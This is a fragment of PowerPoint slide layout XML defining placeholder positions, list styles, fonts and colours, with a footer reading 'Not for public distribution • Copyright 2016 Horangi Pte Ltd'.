            <a:lvl7pPr marL="2743200" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="3200400" marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="3657600" marR="0" lvl="8"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Section Header">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="dk1"/>
        </a:solid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0" y="2416175"/>
            <a:ext cx="9144000" cy="2727323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t"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9" name="Shape 99"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="2416175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" marR="0" lvl="2" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="1828800" marR="0" lvl="4"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5pPr>
            <a:lvl6pPr marL="2286000" marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="2743200" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="3200400" marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="3657600" marR="0" lvl="8"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Section Header">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent2"/>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0" y="2416175"/>
            <a:ext cx="9144000" cy="2727323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t"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2" name="Shape 102"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143998" cy="2416175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" marR="0" lvl="2" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="1828800" marR="0" lvl="4"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5pPr>
            <a:lvl6pPr marL="2286000" marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="2743200" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="3200400" marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="3657600" marR="0" lvl="8"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0_Title Slide">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="lt1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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0" y="1924050"/>
            <a:ext cx="9143998" cy="321945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Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="32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0" y="0"/>
            <a:ext cx="9143998" cy="1924049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="8A8A8C"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="8A8A8C"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" marR="0" lvl="2" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="8A8A8C"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="8A8A8C"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="1828800" marR="0" lvl="4"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5pPr>
            <a:lvl6pPr marL="2286000" marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="2743200" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="3200400" marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="3657600" marR="0" lvl="8"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Only">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 103"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="104" name="Shape 104"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2209574" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Shape 105"/>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6" name="Shape 106"/>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52400" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3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Shape 107"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4767262"/>
            <a:ext cx="600075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2016 Horangi Pte Ltd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Shape 108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="4767262"/>
            <a:ext cx="2114550"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Only">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="dk1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>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a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2209574" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Shape 111"/>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2" name="Shape 112"/>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52400" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" marR="0" lvl="1" indent="-107950" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" marR="0" lvl="2" indent="-76200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" marR="0" lvl="3" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" marR="0" lvl="4" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>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13" name="Shape 113"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4767262"/>
            <a:ext cx="600075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lt1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>Not for public distribution • Copyright 2016 Horangi Pte Ltd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Shape 114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="4767262"/>
            <a:ext cx="2114550"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lt1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Lora"/>
              <a:ea typeface="Lora"/>
              <a:cs typeface="Lora"/>
              <a:sym typeface="Lor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Only">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent2"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 115"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="116" name="Shape 116"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2209574" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Shape 117"/>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8" name="Shape 118"/>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52400" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" marR="0" lvl="1" indent="-107950" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" marR="0" lvl="2" indent="-76200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" marR="0" lvl="3" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" marR="0" lvl="4" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>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19" name="Shape 119"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4767262"/>
            <a:ext cx="600075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lt1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>Not for public distribution • Copyright 2016 Horangi Pte Ltd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Shape 120"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="4767262"/>
            <a:ext cx="2114550"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lt1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Lora"/>
              <a:ea typeface="Lora"/>
              <a:cs typeface="Lora"/>
              <a:sym typeface="Lor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1_Title Slide">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 121"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Shape 122"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431800" y="0"/>
            <a:ext cx="2146300" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="24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3" name="Shape 123"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3365500" y="1349375"/>
            <a:ext cx="5441949" cy="2444750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" marR="0" lvl="0" indent="-21590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1pPr>
            <a:lvl2pPr marL="742950" marR="0" lvl="1" indent="-15875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2pPr>
            <a:lvl3pPr marL="1143000" marR="0" lvl="2" indent="-10160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24" name="Shape 124"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3050116" y="1349375"/>
            <a:ext cx="0" cy="2444750"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="F2F2F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2_Title Slide">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4825996" y="1815059"/>
            <a:ext cx="3860803" cy="2444750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" marR="0" lvl="0" indent="-2286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1pPr>
            <a:lvl2pPr marL="742950" marR="0" lvl="1" indent="-17145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2pPr>
            <a:lvl3pPr marL="1143000" marR="0" lvl="2"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3pPr>
            <a:lvl4pPr marL="1600200" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="2057400" marR="0" lvl="4"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27" name="Shape 127"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1815059"/>
            <a:ext cx="0" cy="2444750"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="A5A5A5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Shape 128"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1815059"/>
            <a:ext cx="3860789" cy="2444750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" marR="0" lvl="0" indent="-2286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1pPr>
            <a:lvl2pPr marL="742950" marR="0" lvl="1" indent="-17145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2pPr>
            <a:lvl3pPr marL="1143000" marR="0" lvl="2"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3pPr>
            <a:lvl4pPr marL="1600200" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="2057400" marR="0" lvl="4"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0" name="Shape 130"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1319757"/>
            <a:ext cx="3860789" cy="410633"/>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2000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
